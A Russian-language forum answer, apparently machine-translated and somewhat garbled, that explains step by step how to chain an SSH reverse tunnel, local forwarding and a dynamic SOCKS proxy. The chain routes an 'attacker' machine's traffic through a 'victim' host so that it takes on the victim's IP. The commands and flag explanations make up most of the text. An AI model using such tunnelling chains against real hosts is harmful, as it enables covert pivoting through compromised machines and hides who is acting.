видимо, никто не может ответить на этот вопрос, это нормально, потому что я сам нашел ответ.
вот ответ:
- On жертвой:
ssh -N -f -R 5555:localhost:22 -p <port_of_serv> <ip_of_serv>
- On нападающий #1:
ssh (-N -f) -L 4444:localhost:5555 -p <port_of_serv> <ip_of_serv>
- On нападающий #2:
ssh -p 4444 -D localhost:3333 user_on_victim@localhost
- On нападающий #3: в Firefox или irc, или даже для общих настроек сети: Socks (v5) настройки прокси: 127.0.0.1 Порт 3333
каждое приложение, которое вы установили хост localhost с портом 3333 Для будет туннелироваться через серв жертве и когда вы посещаете что-то вродеhttp://myip.com вы увидите ip / хост жертвы.
Здесь вы даже можете использовать GUI-приложений на нападающий (если вы настроите настройки socks для конкретного приложения или для системы в целом), которые будут туннелироваться через serv to жертвой и вы будете действуйте как жертвой как таковой.
я сделал ошибку в мой мыслительный процесс был, что я не очень понимаю как обратный схема порта выглядит, я постараюсь объяснить все простыми словами.
действий потерпевшего
ssh -N -f -R 5555:localhost:22 -p <port_of_serv> <ip_of_serv>
-N
= Я не собираюсь запускать команды в оболочке
-f
= поставить процесс в фоновом режиме (так что вы можете закрыть окно терминала)
-R
= обратная тоннель
5555:localhost:22
= 5555 это порт, на котором серв внутренне слушает положить данные вперед к порту 22 на жертвой. Если у вас есть жертва установки, чтобы ssh запускался на порту 2222, вы должны изменить 22 на 2222.
-p
= порт на котором ssh на serv работает.
1-е действие атаки
ssh (-N -f) -L 4444:localhost:5555 -p <port_of_serv> <ip_of_serv>`
1-я команда, которую вы делаете на нападающий (-L 4444:localhost:5555
) будет создан тоннель, так что ваш соединение с вашей 3-й командой будет туннелировано до жертвой. (Это только для приложений динамической переадресации портов / Socks)
если вы просто хотите иметь доступ к Shell на жертвой вместо этой команды вы просто ssh в серв & чем выполнить команду: 'ssh user_on_victim@localhost-p 5555'.
но нам не нужен доступ к оболочке, мы хотим туннелировать все данные динамически, поэтому мы должны сделать переадресацию портов.
или схематическое объяснение
-L
= локальная переадресация портов (on serv)
- 4444:localhost:5555
поместите все данные, поступающие на порт 4444 на порт 5555.
2-е действие атаки
2-я команда, которую вы делаете на нападающий
ssh-p 4444-D localhost: 3333 user_on_victim@localhost
- это фактическая команда, которая инициализирует соединение через 2 туннеля. что вы do is you say: подключитесь к порту 4444 и поместите все данные, которые поступают (порт localhost 3333) на 4444. (который будет проходить локально на serv к порту 5555 -> который будет вытеснен к порту 22 на жертвой.
или схемы объяснения
-D
= динамическая переадресация
localhost:3333
= прослушивание порта 3333 и передача данных через ssh-соединение на порт 4444 на сервер.
-p 4444
= порт, на котором serv слушает поставить пересылку данных в порт 5555 и чем в порт 22 на жертвой.
3-е действие атаки
Настройте свои приложения или даже всю систему для использования прокси-сервера SOCKS (v5) по адресу: localhost порт: 3333. Не имеет значения, на каких портах эти приложения работают нормально, так как они будут обрабатываться прокси-сервером. В теории каждое приложение может работать через SOCKS-прокси динамическая переадресация портов. Вам нужно только настроить его. :)
3-е действие на нападающий это фактические данные, которые вы собираетесь туннелировать в жертвой. Это не имеет значения, какие данные или приложения это, вот почему это динамическая пересылка, это не имеет значения, на каких портах эти приложения работают, потому что это будет обрабатываться SOCKS.
я надеюсь, что кто-то находит применение в моем объяснении.
хорошего дня....